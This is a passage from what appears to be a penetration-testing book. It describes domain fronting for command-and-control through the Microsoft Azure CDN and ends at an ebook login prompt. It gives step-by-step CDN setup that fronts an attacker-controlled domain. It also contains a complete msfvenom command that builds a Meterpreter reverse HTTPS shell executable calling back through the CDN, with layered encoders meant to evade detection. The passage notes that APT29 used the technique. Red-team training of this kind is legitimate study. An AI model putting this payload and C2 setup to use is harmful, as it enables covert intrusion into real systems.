Using Microsoft Azure for C2

Similar to Amazon's CloudFront, Microsoft has Azure portal for the same purpose, providing fast services to their users. Microsoft Azure uses Verizon and Akamai services to deliver a CDN.

In this example, we will utilize a different technique to perform domain fronting with SSL, using Microsoft Azure CDN and Metasploit.

In order to set up a Microsoft Azure CDN, follow these steps:

  1. Log in to the Microsoft Azure portal at https://portal.azure.com/.
  2. Search for CDN, and create a new profile by clicking Add.
  3. Provide a name for your CDN profile, and select Subscription Type, Resources Group, Region, and Pricing Tier (most of the time, the free tier will be sufficient). Tick Create a New CDN end point Now.
  4. Provide the CDN Endpoint name and Origin type (we chose Custom origin), and click Create. It can take up to two hours to propagate throughout the CDN, as shown in the following screenshot:

  1. While you wait for the profile to be up, ensure Caching rules is set to Bypass caching for query strings. This is to ensure it does not cache all traffic, just like a real CDNwe just use it as a communication channel instead.
  2. That should create a new CDN profile, and you should be able to see the hacker-controlled domain and the Azure CDN, shown in the following screenshot. In our case, mastering.cyberhia.com is the hacker-controlled site, and Masteringkali.azureedge.net is the CDN endpoint, which supports both HTTP and HTTPS (as we chose Custom origin):

We will create a Metasploit Meterpreter reverse HTTPS shell using msfvenom, with the domain that does the forwarding, with our header injection as follows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https lhost=<VULNERABLEHOST> lport=443 httphostheader=masteringkali.azureedge.net -e x86/shikata_ga_nai -i 8 raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o /root/chap13/azure.exe

Execution of this payload should get a reverse shell on the C2 server that is behind the Microsoft Azure CDN. This technique was actively utilized by APT29 (a Russian nation-state hacking group) to perform covert attacks.

Testers need to ensure that the domain name behind either Azure or Amazon has a valid A record. For Microsoft Azure, you also need to ensure the CNAME is pointed to the right custom domain to make domain fronting work.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.85.38.100